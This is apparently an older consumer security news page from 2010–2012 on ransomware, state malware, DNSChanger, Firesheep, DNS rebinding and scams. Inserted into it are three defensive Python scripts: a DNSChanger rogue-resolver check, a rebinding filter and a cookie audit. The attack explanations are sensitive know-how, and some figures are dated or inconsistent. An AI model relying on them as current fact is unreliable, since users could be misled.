  12/12 - People do fall for ransomware (see above).  According to the NY Times (12/5/12) the scheme makes about $5 million a year, with between 2.9% and 15% of compromised computers taking the bait and forking over up to $400 to “clean out the viruses”.  And the purveyors have gotten more sophisticated: geolocating the victim's IP address lets them show a customized message in the local language, purporting to be from the FBI or your own country's law-enforcement agency, accusing you of visiting illegal pornography, gambling or piracy sites and demanding a fine to unlock the computer, with threats of criminal charges if payment isn't made within 48 hours.  They may even include video from your own webcam.  Some demand payment via a preloaded debit card, making it impossible to cancel or trace.  Worst of all, paying usually doesn't unlock the computer; you still have to hire a pro for that, and it's not assured that the malware can be removed without damaging the computer's contents.  Symantec counts at least 16 major ransomware gangs, mostly in Russia and Eastern Europe.  Infections come from clicking on links, often on pornographic sites, but also from legitimate sites (even ones hosted at GoDaddy) that have been compromised.

  10/1/12 - This week the FTC filed six lawsuits against those telephone scareware scammers that claim to be a “representative” of Microsoft, Dell or the like, telling you that there’s something wrong with your computer and asking permission to check it, loading malware that infects your computer.  This might at least cause a slowdown to these types of attacks.

  Cyberwarfare is becoming a serious concern.  The SEC has issued guidelines for when cyberattacks should be disclosed by public companies, the MILCW (Manual on International Law Applicable to Cyber Warfare) is being written, the FTC “red flag” rules are in effect, etc.  All this indicates that our government is actively considering the protection from cyberattacks which are currently necessary.

  NYC and Microsoft have partnered to produce the Domain Awareness System (“DAS”), software for aggregating law enforcement databases with real-time data feeds, such as closed circuit cameras, license plate readers and radiation detectors to detect and act on patterns from such data.  It’s the first of its kind and, if it works well, there may be more in the war against terrorism and crime.  This isn’t just the stuff of movies any more.

  May, 2012:  Kaspersky Lab says that since 2010 malware known as Flame has been collecting private data in countries such as Israel and Iran.  It differs from Stuxnet, which targeted nuclear infrastructure in Iran, in that it collects and steals huge amounts of sensitive data.  It is similar to the Duqu malware.  It does not delete data from machines, as the Wiper malware, which hit machines in western Asia, did.  Flame was discovered by Kaspersky Lab in conjunction with the UN's International Telecommunication Union.  UPDATE:  The August, 2012 cyberattack by the “Cutting Sword of Justice” against Aramco, Saudi Arabia's national oil company, involved a virus known as Shamoon, which shut down the company's main computer network for more than a week by wiping tens of thousands of workstation drives clean.  Cyberwarfare has now reached a critical point such that a legal manual on the subject is being prepared [the Tallinn Manual].  Click HERE for more on this subject.

STUXNET (discovered 6/2010)
  Size:     1.3 MB
  Spreads:  via USB thumb drives and peer-to-peer networking
  Does:     modifies industrial control software for remote instructions
  Effect:   quietly sabotaged uranium centrifuges at Iranian nuclear facilities

DUQU (10/2011)
  Size:     0.4 MB
  Spreads:  infected Microsoft Word files, shared network drives
  Does:     logs keystrokes, captures screenshots, stores computer configurations
  Effect:   gathered intelligence for use in later attacks against industrial control systems

FLAME (5/2012)
  Size:     20 MB
  Spreads:  shared network drives, USB thumb drives, printer drivers
  Does:     records audio and screenshots, captures mobile data, intercepts network traffic, steals passwords
  Effect:   spies on users of targeted computers; Iran has the most infected systems

  January, 2012:  Symantec has announced that if you are using its pcAnywhere program for remote access, you should stop.  Apparently the source code was stolen (back in 2006) and has now been published by an Indian hacking group; with the code in the open, the product's security is severely compromised until it is patched.

  If you are using wireless video cameras for security purposes (baby monitor, home or office security), beware that many of these cameras can be easily hacked.   Defeats the purpose, doesn’t it.  For more discussion see FAQ #42

  There have been so many cases where the scammers have claimed to be from Microsoft, that Microsoft has created a web page discussing them.  Click HERE.

 As if you didn't have enough problems with attachments and programs, now it's been discovered that Adobe PDF files can be used to deliver malware, and many anti-virus programs fail to detect it.  It applies to unpatched versions 7 and 8 of Acrobat and Acrobat Reader on Windows XP SP2 with Internet Explorer 7 installed, where a crafted PDF can trigger an exploit that seriously infects your computer.  Upgrade to the current Ver. 8 release if at all possible, or else switch to an alternative third-party PDF reader such as Foxit Reader or CutePDF.  For more information see Microsoft KB 943521.

 For the first time in about 8 years, we’re seeing an increase in Master Boot Record viruses and rootkits.  They’re difficult to locate, even for pros, and even harder to remove, requiring specialized software.

 Symantec tells us (August, 2010) about a rogue anti-virus operation that combines with telemarketing.  A company named Online PC Doctors cold-calls users, convinces them their computers are infected, then offers to connect remotely to the “infected” machine and “clean” it for a fee.  This company (www.onlinepcdoctors.com) requests lots of personal information, including a copy of your driver's license and credit card, and explicit approval to charge the card.  They convince users that their computer is infected by having them open the Windows Event Viewer and, when the routine warnings and errors that every Windows machine logs are listed, claiming that the machine is, indeed, infected.  Not so.  Don't get taken by this scam.

  August 3, 2012:  The 2012 Black Hat Security Conference revealed some new and creative hacking:  It was demonstrated that, using NFC, some Android-based smartphones could be compromised by “beaming” malicious files and web pages to them from a nearby device.  Also, the Rakshasa malware, a proof of concept that opens a hard-to-detect backdoor in PCs by infecting the BIOS and other firmware.  Last, an inexpensive tool built on an Arduino microcontroller board that could open hotel room loc­ks manufactured by Onity by plugging into the programming port at the bottom of the lock, which gave access to the lock's memory without any authentication.

  July 19, 2012:  A spam botnet named Grum, reportedly responsible for 18% of the world's spam, was shut down today after its command-and-control servers in Panama, Russia and Ukraine were taken down.  The spammers did manage to shift some of the spam to other countries, however.

  July, 2012:  Beware the Blackhole drive-by exploit kit.  It's a crimeware kit that lets cybercriminals rent web pages that silently attack visitors through unpatched browser plug-ins (Java, Flash, Adobe Reader) and deliver payloads such as the kernel-mode rootkit ZeroAccess.  Keep your browser, plug-ins and anti-virus signatures current to avoid such intrusions!

  July 14, 2012:  Yahoo was hacked out of 450,000 passwords and login credentials, which it had stored in plain text.  Add this to other recent hacks of Twitter, Facebook [via the Ramnit.C worm] and other social networks and you can see that they're not all that secure.  At the least, use a different password for social networking sites, not the same one you use for everything else (like banking).

  July 9, 2012:  Although it's unlikely, your computer may still carry the DNSChanger malware, which could leave you unable to access the Internet now that the FBI is shutting down the substitute DNS servers it has been running since the arrests.  Some 640,000 computers worldwide (about .01%) may still be infected, although that's not many.  To find out if you may be part of that group, click HERE.  UPDATE:  Of course, the predicted outages fizzled; nothing much happened.

  June, 2012:  Most anti-virus and anti-malware software works by trying to stop the bad stuff before it gets into your computer.  Once it gets through, however, it's another issue.  But there may be hope:  A company named Bromium is working on software that opens each attachment, e-mail and browser tab in its own tiny temporary virtual machine, watches what it does and, if it finds something bad, discards that compartment before it can damage the computer.  It should be out later this year.

  June, 2012:  Text message spam has risen 45 percent in 2011, to 4.5 billion messages.  Generally, most messages appear to originate from the coasts of the U.S. (maybe the spammers live there) and the three most popular states are: New York (beware texts from 347, 201 & 917 area codes), Florida (area code 786) and California (310 area code).

  May, 2012:  DNSChanger hits.  It's the subject of dire warnings across the Internet.  In reality, it is a malware variant of the TDSS/Alureon family of Trojans.  Its botnet was one of the largest ever, until it was taken down in November, 2011 by a joint FBI-Estonian police action code-named “Operation Ghost Click”.  But infected machines are still out there, some four million computers having been hit in the U.S. and elsewhere, so beware.  It infected systems by posing as a video codec that had to be downloaded to view a video, then changed the computer's DNS server settings to point at the gang's own resolvers, which redirected users to sites selling mostly fake pharmaceuticals, anti-virus products and the like.
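Because DNSChanger worked by rewriting the computer's DNS server settings, the check the FBI and the “click HERE” test above relied on is simple: compare the configured resolvers with the address ranges the gang's rogue servers lived in.  The script below is an added example (not code from the original page or from the FBI's test site) that does that for both the July 9 and the May entries; the resolv.conf text is constructed, and the ranges are the ones published for the Rove Digital servers at the time, so check them against your own reference before relying on this.

```python
"""
Added example, not from the original page: check the DNS resolvers a
machine is configured to use against the rogue resolver address ranges
published by the FBI for the DNSChanger (Rove Digital) botnet.  The
resolv.conf text below is constructed; on Windows you would feed in the
"DNS Servers" lines from `ipconfig /all` instead.
"""
import ipaddress
import re

# Rogue resolver ranges as published for DNSChanger; assumption: unchanged since.
ROGUE_RANGES = [ipaddress.ip_network(n) for n in (
    "85.255.112.0/20", "67.210.0.0/20", "93.188.160.0/21",
    "77.67.83.0/24", "213.109.64.0/20", "64.28.176.0/20")]


def parse_resolvers(text):
    """Pull nameserver addresses out of resolv.conf-style text."""
    servers = []
    for line in text.splitlines():
        m = re.match(r"\s*nameserver\s+(\S+)", line)
        if not m:
            continue
        try:
            servers.append(ipaddress.ip_address(m.group(1)))
        except ValueError:            # not an IP address; ignore the line
            pass
    return servers


def rogue_resolvers(servers):
    """Subset of servers that fall inside a DNSChanger range."""
    return [str(s) for s in servers if any(s in net for net in ROGUE_RANGES)]


def check_resolv_conf(text):
    return rogue_resolvers(parse_resolvers(text))


# Constructed sample inputs.
SAMPLE_CLEAN = "search lan\nnameserver 192.168.1.1\nnameserver 8.8.8.8\n"
SAMPLE_INFECTED = "nameserver 85.255.113.7\nnameserver 67.210.3.22\nnameserver 8.8.8.8\n"

if __name__ == "__main__":
    try:
        text = open("/etc/resolv.conf").read()   # Linux/macOS; falls back to the sample
    except OSError:
        text = SAMPLE_INFECTED
    bad = check_resolv_conf(text)
    print("rogue resolvers:", bad or "none")
```

On a home network the router is usually the only resolver the PC sees, so run the same check against the router's own DNS settings as well; DNSChanger also rewrote those on routers with default passwords.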

  April, 2012:  Over 600,000 Macs have been infected with the Flashback Trojan virus.  See the Mashable Tech article with fixes at this link.  Either way, don’t forget to install the latest Apple updates, which patch the Java vulnerability that let the virus in in the first place.  You might also consider a security suite like Avast, Sophos or Kaspersky, lock down your administrative privileges, remove or disable Java or Flash unless required, and reinforce your passwords.

  April, 2012:  Kaspersky says that malicious threats targeting mobile devices have significantly increased - 2011 saw six times the threats of 2010.  The Android O/S led the pack.  SMS trojans posed the greatest threat, followed by backdoors and then spyware.  On the bright side, there was a 50% decrease in spam, 50% decrease in cross-site scripting and 30% decrease in exploit code.

2011

  November, 2011:  Internet security firms have reported that the Duqu Trojan virus is a zero-day exploit of a previously unknown vulnerability embedded in Microsoft Word files.  The virus has infected a total of eight countries, including Iran, India, France and Ukraine, but not yet the U.S.  It seems to target and scan internal corporate systems to gather information, reporting back to an as yet unknown source.  It doesn’t look like a problem for most residential surfers, although Microsoft is working on a patch.

  October, 2011:  If you’ve ever wondered whether some of the spam you receive is the result of your friends on Facebook, Norton now offers a tool called Norton Safe Web, which scans your web browser to see if any infected links come from your Facebook account. If you’re an active Facebook user, this may interest you.

  September, 2011:  According to the NY Times (9/29/11), Heidi Klum is this year’s most dangerous celebrity - to search for on the Web at least - according to McAfee Security.  Clicking on links promising sexy pictures of her comes with a nearly one-in-10 chance of contracting a bad case of malware.

  August, 2011:  The Morto worm, which targets Windows computers by exploiting poorly chosen passwords through Remote Desktop Protocol (“RDP”), has arrived and, if it gets into your network, it can clog the network.  But it’s not much of a concern if your anti-virus software is kept current.

  July, 2011:  Recent events (the U.K. News of the World scandal) have prompted people to wonder if they’re vulnerable to “phone hacking.”  Actually, this is a misnomer, as what is actually involved is simply illicit access to voicemail messages, usually because the phone’s user has failed to change the default PIN for voicemail access (e.g. “password” or “admin”).  If you haven’t changed the default issued with your voicemail account, someone could dial the carrier’s access number, enter the default PIN and listen to your messages.  The answer:  Set your personal PIN.

  July, 2011:  By now, you should realize that Firefox automatically updates itself.  So, if you receive an e-mail allegedly from Mozilla asking you to update, don’t click on it.  It does download Mozilla.  But it is also a Trojan Horse known as Troj/PWS-BSF which can steal passwords.

  July, 2011:  Those spammers sure don’t waste any time.  In the same week that Google+ was introduced, they sent out bogus Google+ invitations that were actually online pharmacy come-ons.

  More than 4 million Windows PCs have been infected since March, 2011 by a botnet known as “TDL.”  The boot sector virus, now in its fourth version, is close to indestructible, according to Kaspersky Labs, and spreads via web sites, particularly those that let people store video and image files.  

  June, 2011:  Link to the Mac page to read about the Mac Defender virus and other security updates for Macs.  It also covers the malware infections you can subject yourself to if you follow the jailbreakme website’s instructions.

 Guardian Analytics reports that about 75% of SMBs in the U.S. experienced online fraud and/or bank account takeover in the 12 months preceding April, 2011.  Banks didn’t detect the fraud in 78% of the cases.  Businesses suffered monetary losses 60% of the time, the bank 37% of the time.

 Microsoft IE9’s “Do Not Track” feature doesn’t have any teeth.  When you enable this feature in your browser (same for Firefox 4; not available in Chrome and Safari), it’s only a request, indicated by an electronic flag that is visible to web operators.  But they aren’t obligated by law or otherwise to honor such requests.  In fact, there may be as yet no technological way to do so.  For now, just stick with deleting cookies and search histories or using anonymous browsers.

 March, 2011:  Good news!  Led by Microsoft, Pfizer and FireEye, the Rustock botnet, which pumped out 44 billion pieces of spam (mostly masquerading as Canadian pharmacies, actually located in India and elsewhere) is no more, at least for now.  The amount of spam worldwide actually dropped by 47.5%!

 May, 2011:  Hacker groups LulzSec and Anonymous invaded police departments, the CIA, PBS, the U.S. Senate, Fox and other sites.  After 50 days, they retired.

 March, 2011:  Recently, malware known as LizaMoon has hijacked links on literally millions of websites, including some of the normally safe ones such as iTunes and Google.  Like Anti-Virus 2011, LizaMoon uses rogue-AV scare tactics to trick you into running bogus cleanup tools on your PC, usually to no avail.  You can avoid this by simply not clicking on the come-on.

 2011 Virus Stats:  PandaLabs reports that malware increased 26% during the beginning of 2011, and 16% over the end of 2010.  70% were Trojans.  Similarly, IBM’s 2010 Trend & Risk Report found that almost half of vulnerabilities were web application issues, caused by cross-site scripting and SQL injection attacks (see SPYWARE page).

2010

 ZeuS (a/k/a Trojan.Zbot) just won’t go away.  One of the most damaging and persistent pieces of malicious code, ZeuS runs below the radar as a rootkit, where it gathers account numbers and passwords, then sends them off to data dump dropzones over the Web.  What makes ZeuS more damaging is its ability to evolve, infecting machines through a variety of sources, focusing on differing attack vectors, modifying web pages, even attacking smart phones.  It’s difficult to protect against and remove.  And it’s not going away any time soon; in fact it’s for sale on the Internet.

 It’s a new year and the security summaries for 2010 have been published, along with the vulnerability predictions for 2011.  No great surprises here.  Cisco reports that, while mass attacks are reduced, targeted attacks like phishing, identity theft and malware are on the rise, as the payoff is greater.  Summarized:  As more people use mobile devices and bring them into the workplace, they will come to the forefront of security.  Social media attacks will become more common and more complex, as e-mail and ordinary virus attacks decline.  Rootkits and MBR viruses will increase, however.  McAfee and Trend Micro say their data shows that Google’s Android platform as well as Apple’s iPhone and Mac OS, the geolocation service FourSquare and the URL-shortening services used by Twitter and FaceBook are all in cybercriminals’ crosshairs.  NetWitness and Websense also predict that botnets are now roaring back in the new year after a downturn in the final quarter of 2010, and that there will be a botnet “cyberwar” which will most likely be won by the Zeus botnet (over competitors Kneber, Rustock and Waledac), which will be incrementally upgraded with opt-in and JavaScript cross-site.  Finally, as the result of the Wikileaks controversy, there may also be an increase in politically motivated attacks.

 2010 Virus Stats:  In the 4th quarter of 2010, 1.2 million web sites were affected by malware according to Dasient Internet Security, double that of Q4 2009.  Most were drive-by downloads (see Spyware), surpassing older forms of incursion such as spam and e-mail attachments.  Maybe the arrest of Russian Oleg Nikolaenko (a/k/a The King of Spam), author of the Mega-D botnet which sent 10 million spam e-mail messages a day, has had some (temporary) effect.

 The Microsoft security scammers are back again.  If you receive an e-mail allegedly from the “Microsoft Security Team” urging you to update your Windows, don’t fall for it.  The subject line may say “Update Your Windows” and it may be from Steve Lipner (who really is with Microsoft’s security team), and it may attach a file (KB453396-ENU.zip).  Trash this mail, as it will infect your computer.  And remember - Microsoft NEVER sends e-mails with security updates.

 Some viruses have actually been unleashed by hackers dropping a USB drive in a parking lot, where a (naturally) curious person picked it up and plugged it in.  The infamous Stuxnet worm in mid-2010 was also most likely propagated through USB flash drives.  It is likely that this vector for malware delivery will increase in the future.  One way to make it less likely to do its damage is to disable the “autorun.inf” file in Windows.  That’s the file that automatically loads programs or searches for drivers once a disk or device is inserted into the computer.  If it runs automatically, a virus on the media may load automatically; also, if Windows must automatically search the web for a driver for the device, it may go to a site which will download a purposely infected driver.  To disable the driver search feature in Windows (which would still allow you to search for a missing driver, although manually), here’s how: In Windows XP, Start>Control Panel>System>Hardware Tab>Drivers>Windows Update, then uncheck “Never Search Windows Update for Drivers”.  In XP and Win7, Start>type “change device installation settings” in the search box>in the pop-up window, under “Do you want Windows to download driver software...” select “No, let me choose what to do,” then choose the option “Never install driver software from Windows Update”.  Disabling the autorun feature is more complex, involving editing of a registry key (see HERE).

 Sophos advises awareness of the Windows Shortcut Exploit (also known as CPLINK), which is a “zero day vulnerability” in all versions of Windows which allows a Windows shortcut link (known as a .lnk file) to run a malicious DLL file.  The exploit runs when you open a device or network share and requires NO further action from you, as the .lnk file can be embedded in a web page or even in a document.

 You may notice you receive fewer “Nigerian scam” e-mails.  Okpako Mike Diamreyan of Nigeria has been convicted and sentenced to 12 years in prison after sending fraudulent e-mails offering victims money for moving cash to the U.S.  He made more than $1.3 million from 67 victims between 2004 and 2009.  See the Rant page of this site - I can’t believe people still fall for this.

 Worms are back.  No, not the old, simple “I Love You” attachment worm, but the new, improved XSS (“cross-site scripting”) worms that aren’t caught by traditional anti-virus programs.  [See Spyware for deeper discussion.]  To be completely protected, you should turn off JavaScript for new sites unless absolutely necessary and, of course, never click on links in an e-mail or on the web unless you’re absolutely sure they’re safe.  Also, keep current with your browser updates; they provide some degree of protection.

 Discussions at the 2010 DEFCON security conference revealed that commonly used residential routers, such as the Linksys WRT54G, are subject to an attack known as “DNS rebinding,” which uses a script to get around security measures taken in the router firmware.  Because most large Internet sites, such as Google, have multiple IP addresses (for load balancing and the like), your computer stores these extra IPs and considers them acceptable.  When you visit a site in which malicious software is embedded, it loads a script onto your computer which runs under one of these “pre-stored” sites, then establishes an Internet connection to your computer, allowing the hacker to possibly control your router and, therefore, everything on your computer.  It is not browser specific, and only applies to some routers.  What can you do about this?  First of all, most routers are set up using an Internet address (192.168.1.1), with a network name and password.  Do NOT keep the default password (Admin, Password, or the like).  Change it.  See Password for more info about a secure password.  Same for the default SSID (network name), e.g. Linksys.  Change it.  Also, keep your router firmware updated regularly.  Of course, don’t trust unknown web content, even ads on trusted websites.  If you are a more advanced user (careful here, you can seriously screw up your computer), you could disable HTTP and enable HTTPS in your router settings, maybe disable UPnP (but not if you have services such as Skype), use the NoScript browser plug-in for Firefox (which blocks Java, Flash and ActiveX, asking first before allowing them), or even switch to OpenDNS, which changes DNS from your ISP’s defaults to those of OpenDNS (208.67.220.220 and 208.67.222.222).  If you need help, call!
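The OpenDNS tip above works because a filtering resolver refuses to let a public hostname resolve to an address inside your home network, which is exactly what a rebinding script needs.  The script below is an added example (not from the original page or from any router or resolver vendor) of that same check, written so you can run it offline on constructed resolver answers; the hostnames and addresses in it are made up for illustration, and the local-suffix list is an assumption.

```python
"""Resolver-side filter against DNS rebinding (added example, not from the page).

A rebinding attack answers a public hostname with an address inside the LAN so
that a script loaded from the attacker's page can talk to the router on
192.168.1.1. The defence below, the same idea as a filtering resolver's
rebinding protection, rejects any answer for a public name that points at a
private, loopback, link-local, unspecified or multicast address.
"""
import ipaddress
from typing import Iterable, List, Tuple

# Assumption: names under these suffixes belong to the local network and may
# legitimately resolve to LAN addresses (e.g. router.lan).
DEFAULT_LOCAL_SUFFIXES = ("lan", "local", "home")


def is_internal_address(addr: str) -> bool:
    """True for addresses a public Internet hostname should never resolve to."""
    ip = ipaddress.ip_address(addr)  # raises ValueError if not an IP literal
    # ::ffff:192.168.1.1 is still the router; unwrap IPv4-mapped IPv6 first.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast)


def is_local_name(hostname: str, local_suffixes: Iterable[str]) -> bool:
    """True if hostname sits under one of the local suffixes."""
    name = hostname.rstrip(".").lower()
    for suffix in local_suffixes:
        s = suffix.lower().strip(".")
        if name == s or name.endswith("." + s):
            return True
    return False


def filter_answers(hostname: str, answers: Iterable[str],
                   local_suffixes: Iterable[str] = DEFAULT_LOCAL_SUFFIXES
                   ) -> Tuple[List[str], List[str]]:
    """Split resolver answers for hostname into (accepted, rejected).

    Internal addresses are rejected unless the name itself is local. A public
    name whose answers mix public and internal addresses is the classic
    rebinding shape: the public one gets the page loaded, the internal one is
    what the script then talks to.
    """
    accepted: List[str] = []
    rejected: List[str] = []
    local = is_local_name(hostname, local_suffixes)
    for answer in answers:
        try:
            internal = is_internal_address(answer)
        except ValueError:
            rejected.append(answer)  # garbage in the answer section: drop it
            continue
        if internal and not local:
            rejected.append(answer)
        else:
            accepted.append(answer)
    return accepted, rejected


if __name__ == "__main__":
    # Constructed answers: one plausible public address plus two LAN addresses
    # smuggled into the same response for a public name.
    print(filter_answers("cdn.example.com",
                         ["93.184.216.34", "192.168.1.1", "::ffff:10.0.0.1"]))
    # The router's own local name is allowed to map to a LAN address.
    print(filter_answers("router.lan", ["192.168.1.1"]))
```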

In December, 2010 Adobe released version 10 of Adobe Reader.  It’s more secure, as it adds “Protected Mode,” which provides enhanced malware protection based on sandboxing technology.  While it’s not foolproof, it’s quite effective.  However, be aware that you must completely remove previous versions of Adobe Reader (use Add & Remove Programs in Control Panel) before installing version 10.  Word is, Adobe Flash will also be getting this feature.

 Cell phone security tips:  Don’t jailbreak your iPhone - because that breaks all of the security.  If your phone has a “locate and wipe” feature, enable it.  That way, if you lose and can’t find your phone, at least you can erase your data.  Most important - set a passcode.  At least it’ll slow down a thief.  Don’t just use the default - that’s how the News Corp. hackers got into cell phones, assuming users were lazy.  And some were.

Beware Firesheep.  This recently released Firefox add-on is an app that lets Wi-Fi snoops grab session cookies broadcast over open networks in order to get access to victims’ accounts, known as “sidejacking.”  This basically occurs because many sites (including some e-mail sites such as Hotmail, and FaceBook) use a secure connection for the logon, but then go back to an unsecure connection afterwards.  Now, zscaler.com has posted on its site a countermeasure named “Blacksheep” (for both Windows and Mac) which “cloaks” your connection to foil Firesheep snoopers.  Also, you can use a VPN, or HTTPS (as Twitter has suggested, and which it enabled starting March, 2011).
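The root cause above is a session cookie that the browser keeps sending over plain HTTP after the HTTPS logon.  As an added example (not code from the original page or from the Firesheep or Blacksheep authors), the script below audits a captured set of HTTP response headers for that exposure: a session cookie without the Secure attribute, and no Strict-Transport-Security header to keep the browser on HTTPS.  The header lines are constructed, and the list of name fragments used to recognise session cookies is an assumption.

```python
"""Audit HTTP response headers for sidejacking exposure (added example, not from the page).

Firesheep works because the session cookie set after an HTTPS login is sent
again, in the clear, on every later plain-HTTP request to the same site. A
cookie carrying the Secure attribute is never sent over HTTP, and a
Strict-Transport-Security header stops the browser from using HTTP at all.
"""
from typing import Dict, List, Tuple

# Assumption: cookies whose names contain one of these fragments are treated
# as session/authentication cookies.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")

Header = Tuple[str, str]


def parse_set_cookie(value: str) -> Tuple[str, Dict[str, str]]:
    """Return (cookie name, lower-cased attribute map) for one Set-Cookie value.

    Flag attributes such as Secure and HttpOnly appear with an empty value.
    """
    parts = [p.strip() for p in value.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name, attrs


def looks_like_session_cookie(name: str) -> bool:
    lowered = name.lower()
    return any(hint in lowered for hint in SESSION_NAME_HINTS)


def audit_headers(headers: List[Header]) -> List[str]:
    """Return findings for one captured response; an empty list means no exposure found."""
    findings: List[str] = []
    names_present = {k.lower() for k, _ in headers}
    if "strict-transport-security" not in names_present:
        findings.append("no Strict-Transport-Security header: "
                        "browser may fall back to plain HTTP")
    for key, value in headers:
        if key.lower() != "set-cookie":
            continue
        name, attrs = parse_set_cookie(value)
        if not looks_like_session_cookie(name):
            continue  # preference cookies like lang=en are not worth stealing
        if "secure" not in attrs:
            findings.append(f"{name}: missing Secure; sent in the clear on "
                            "HTTP requests (sidejackable)")
        if "httponly" not in attrs:
            findings.append(f"{name}: missing HttpOnly; readable by page scripts")
    return findings


# Constructed sample responses: the weak pattern the page describes, and the
# same site after fixing the cookie attributes and adding HSTS.
LEAKY_RESPONSE: List[Header] = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SESSIONID=constructed123; Path=/; HttpOnly"),
    ("Set-Cookie", "lang=en; Path=/"),
]
HARDENED_RESPONSE: List[Header] = [
    ("Content-Type", "text/html"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "SESSIONID=constructed123; Path=/; Secure; HttpOnly"),
    ("Set-Cookie", "lang=en; Path=/"),
]

if __name__ == "__main__":
    for label, hdrs in (("leaky", LEAKY_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(label, audit_headers(hdrs) or ["ok"])
```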

Lately, many viruses have found their way into computers through unpatched versions of Flash and also Java.  There aren’t many applications that demand Java any more (Open Office is one exception), so if you don’t need it, you can uninstall it.

We all expected that, as cellphones and VoIP became more common, malware and viruses would eventually arise on these devices.  And they have.  For example, users of Skype have to worry about the W32/Pykse.worm, which uses Skype for spreading.  Also, the PWS-Pkyse Trojan, which attempts to steal Skype user names and passwords (this one masquerades as a “Skype-Defender” plug-in for Skype).  Cellphones have been infected by the commwarrior virus around the world, also the RavMonE.exe virus.  In late 2009, Kaspersky Lab reported a new malicious program that steals money by taking over Nokia phones and making small charges to the owners’ wireless accounts.  Also in late 2009, an Australian student created an experimental worm that infected iPhones adapted to run unauthorized Apple software; it didn’t cause any damage, just installed a photo of 80’s pop star Rick Astley.  Also, recognizing that this threat is increasing, various companies are starting to offer protection - Lookout (a startup), Symantec, Research In Motion, among others, are starting to get out the message.  It can only get worse, so be vigilant!  See this LINK to learn how to disinfect your cell phone if you get a virus.  If in doubt, or you’re afraid you’ll ruin your computer or phone, call a pro!

Not too long ago, we were pretty safe advising clients just to not open their e-mail if they didn’t recognize the sender.  That was because historically, at that time, malware came into the computer via e-mail on Port 25 (which has been changed by some ISPs such as Comcast and Verizon to Port 587 for just this reason).  Now, 85% of malware infections come through web traffic, according to Webroot software.  So make especially sure that you have excellent malware filters.  Still, NEVER open unexpected file attachments, whether Office, PDFs or otherwise.  Microsoft does offer patches for different versions of Word and Excel, downloadable from its website; your anti-virus should do the rest.

Researchers at Verisign have reported that, since February 2007, more than 15,000 victims have fallen prey to spear-phishing attacks.  They believe that two crime groups are responsible for 95% of the attacks, but do not expect the attacks to let up.  Two of the most successful attacks involved e-mails that claimed to be from the IRS or the Better Business Bureau or e-mails that appeared to be subpoenas for court charges.  [See, Spyware page.]

McAfee, the security technology company, reports that the chance of downloading unwanted software while surfing the Web has increased 41.5% compared to last year.  According to McAfee, Hong Kong websites top the list, with more than 19% of all web sites that end with the .hk domain posing a security risk such as adware, spyware, viruses, spam, excessive pop-ups or browser exploits.  Second most dangerous was The People’s Republic of China (.cn domain), followed by Philippines (.ph), Romania (.ro) and Russia (.ru).  On the other hand, the safest countries are Finland (.fi), Japan (.jp) and Norway (.no).

Security research company Trend Micro recently reported that of the top 100 infections in the U.S. in 2008, approximately 63% were caused by downloading and running programs; e-mail borne infections only accounted for 3%, and the exploitation of security flaws in products was responsible for only 1.7% of PC infections.  Contrary to popular belief, then, visits to malicious websites and e-mail are not the major cause of infections.  The most common sources were software - free games, utilities, toolbars, pornography and pirated software.

March, 2010: In a security advisory, Microsoft advised Windows XP users not to press the F1 key when prompted by a web site, because, due to a logic flaw, attackers could craft an attack through an unpatched vulnerability that could exploit PCs running Internet Explorer.  The dialogue box prompting users to press the F1 Help key, which can appear repeatedly when dismissed, should be ignored.  A patch should be available within the next couple of weeks and will be automatically downloaded through Windows Updates.

Looking for a secure flash drive for your files or a bootable USB drive when you are on the road?  So-called “hardened” flash drives which use military grade encryption, self-destruct features, password memory and other neat features are available if you want to pay more for your drive.  An example is IronKey, at about $99 for a 2GB drive, $149 for 4GB.  Other drives are manufactured by Kingston, Corsair, Imation and Lexar.

Adobe has released Flash 10.1, which is said to conserve battery power, make video run more smoothly on mobile devices, and will also support touchscreen gestures such as pinching or widening the screens, along with patching possible spyware/virus holes.  When it arrives, download it, or CLICK HERE for the link.

September, 2010:  E-mails with the subject line “Here you have...” can transmit viruses which can infect Windows computers.  Most anti-virus programs should detect this by now, but still be aware of their existence.

Verizon’s “2010 Verizon Data Breach Report,” prepared in cooperation with the U.S. Secret Service, has been released and it contained both good news and bad news:  Good news: There’s been a decline in the number of compromised electronic records, from 295 million in 2008 to 143 million in 2009.  The bad news:  48% of data breaches were due to employee misuse of access to company information, not outside hackers.  The moral:  Restrict user access to company information and monitor frequently for violations.

Intel, the world’s largest chipmaker, announced on August 19, 2010 that it will acquire McAfee Internet Security for $7.68 billion, making Intel a major player in the security software and services market.  Analysts expect that many of the tools that McAfee provides today may be built in to Intel chips and devices over time, which may change the nature of the security industry.  Intel has already built a variety of security functions directly into its chips and provided customers ways to tap into the tools.

January, 2010: A malicious software program known as the “Kneber botnet” has infected the computers of more than 2,500 corporations around the world.  Its purpose appears to be to compromise both commercial and government systems, including 68,000 corporate log-in credentials.  It has also gained access to e-mail systems, on line banking accounts, Facebook, Yahoo, Hotmail and other social network credentials and more than 2,000 digital security certificates as well as a significant cache of personal identity information.  The botnet makes sophisticated use of a Trojan Horse backdoor entryway known as ZeuS, which was primarily a Trojan for stealing banking information.  A similar earlier botnet known as Waledac also compromised many corporate systems.

If you’re a business traveler using wireless networks when you are on the road, you should be aware of the “Hole 196” vulnerability in 802.11 networks using even the more secure WPA2 security.  Basically, it is a man-in-the-middle attack that can only be carried out by an authorized network user.  Airtight Networks has developed a security patch.

The Stuxnet virus of 2010 affected primarily Siemens machines, which are used by manufacturers.  Note that many manufacturing machines were built years before password security or even Internet connectivity, so they are particularly at risk of hacking now.  It is increasingly believed that the worm virus was an attack by Israeli intelligence against Iran and other countries which were developing enriched uranium, necessary for nuclear bombs.  The worm causes quick rotational changes in centrifuge and other motors, causing them to burn out.

